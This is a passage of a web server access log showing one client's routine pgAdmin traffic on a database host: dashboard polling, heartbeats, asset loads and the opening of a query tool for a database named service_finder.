Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:09:26:28 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 267] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:09:26:33 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 267] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:09:26:38 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 267] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:09:26:43 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 267] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:09:26:48 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:09:26:48 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 267] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:09:27:24 +0000] - 200 200 - POST https db.profibot.hu "/misc/cleanup" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:09:27:24 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 267] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:09:27:24 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:09:28:24 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:09:28:24 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 267] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:09:29:24 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:09:29:24 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 267] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:09:30:24 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:09:30:24 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 267] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:09:31:24 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:09:31:24 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 267] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:09:32:24 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:09:32:24 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 267] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:09:32:24 +0000] - 200 200 - POST https db.profibot.hu "/misc/cleanup" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:09:33:24 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:09:33:24 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 267] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:09:34:24 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:09:34:24 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 267] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:09:35:24 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:09:35:24 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 267] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:09:36:24 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:09:36:24 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 267] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:09:37:24 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:09:37:24 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 267] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:09:37:24 +0000] - 200 200 - POST https db.profibot.hu "/misc/cleanup" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:09:38:24 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:09:38:24 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 267] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:09:39:24 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:09:39:24 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 267] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:09:40:24 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:09:40:24 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 267] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:09:41:24 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:09:41:24 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 267] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:09:42:24 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:09:42:24 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 267] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:09:42:24 +0000] - 200 200 - POST https db.profibot.hu "/misc/cleanup" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:09:43:24 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:09:43:24 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 267] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:09:44:24 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:09:44:24 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 267] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:09:45:24 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:09:45:24 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 267] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:09:45:48 +0000] - 302 302 - GET https db.profibot.hu "/" [Client 84.1.26.27] [Length 205] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "-" +[27/Jan/2026:09:45:48 +0000] - 200 200 - GET https db.profibot.hu "/browser/" [Client 84.1.26.27] [Length 2933] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "-" +[27/Jan/2026:09:45:48 +0000] - 200 200 - GET https db.profibot.hu "/browser/browser.css?ver=91100" [Client 84.1.26.27] [Length 4180] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:09:45:49 +0000] - 200 200 - GET https db.profibot.hu "/browser/js/messages.js?ver=91100" [Client 84.1.26.27] [Length 883] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:09:45:49 +0000] - 200 200 - GET https db.profibot.hu "/browser/js/endpoints.js?ver=91100" [Client 84.1.26.27] [Length 3738] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:09:45:49 +0000] - 200 200 - GET https db.profibot.hu "/user_management/current_user.js?ver=91100" [Client 84.1.26.27] [Length 477] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:09:45:49 +0000] - 200 200 - GET https db.profibot.hu "/browser/server/supported_servers.js?ver=91100" [Client 84.1.26.27] [Length 291] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:09:45:49 +0000] - 200 200 - GET https db.profibot.hu "/browser/js/utils.js?ver=91100" [Client 84.1.26.27] [Length 3129] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:09:45:49 +0000] - 200 200 - GET https db.profibot.hu "/tools/translations.js?ver=91100" [Client 84.1.26.27] [Length 321] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:09:45:50 +0000] - 200 200 - GET https db.profibot.hu "/browser/check_corrupted_db_file" [Client 84.1.26.27] [Length 61] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:09:45:50 +0000] - 200 200 - GET https db.profibot.hu "/misc/bgprocess/" [Client 84.1.26.27] [Length 2] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:09:45:50 +0000] - 200 200 - GET https db.profibot.hu "/preferences/get_all" [Client 84.1.26.27] [Length 11809] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:09:45:50 +0000] - 200 200 - GET https db.profibot.hu "/settings/get_tree_state/" [Client 84.1.26.27] [Length 429] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:09:45:50 +0000] - 200 200 - GET https db.profibot.hu "/browser/nodes/" [Client 84.1.26.27] [Length 273] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:09:45:50 +0000] - 200 200 - POST https db.profibot.hu "/browser/master_password" [Client 84.1.26.27] [Length 166] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:09:45:50 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/new_connection_dialog" [Client 84.1.26.27] [Length 313] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:09:45:50 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/new_connection_dialog" [Client 84.1.26.27] [Length 313] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:09:45:50 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/new_connection_dialog" [Client 84.1.26.27] [Length 313] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:09:45:50 +0000] - 200 200 - GET https db.profibot.hu "/settings/object_explorer_filter" [Client 84.1.26.27] [Length 95] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:09:45:50 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/new_connection_dialog" [Client 84.1.26.27] [Length 313] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:09:45:50 +0000] - 200 200 - POST https db.profibot.hu "/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" [Client 84.1.26.27] [Length 2906] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:09:45:51 +0000] - 200 200 - GET https db.profibot.hu "/browser/browser.css?ver=91100" [Client 84.1.26.27] [Length 4180] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[27/Jan/2026:09:45:51 +0000] - 200 200 - GET https db.profibot.hu "/misc/upgrade_check?trigger_update_check=false" [Client 84.1.26.27] [Length 77] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:09:45:52 +0000] - 200 200 - GET https db.profibot.hu "/browser/js/messages.js?ver=91100" [Client 84.1.26.27] [Length 883] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[27/Jan/2026:09:45:52 +0000] - 200 200 - GET https db.profibot.hu "/browser/js/endpoints.js?ver=91100" [Client 84.1.26.27] [Length 3738] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[27/Jan/2026:09:45:52 +0000] - 200 200 - GET https db.profibot.hu "/browser/server/supported_servers.js?ver=91100" [Client 84.1.26.27] [Length 291] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[27/Jan/2026:09:45:52 +0000] - 200 200 - GET https db.profibot.hu "/browser/js/utils.js?ver=91100" [Client 84.1.26.27] [Length 3131] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[27/Jan/2026:09:45:52 +0000] - 200 200 - GET https 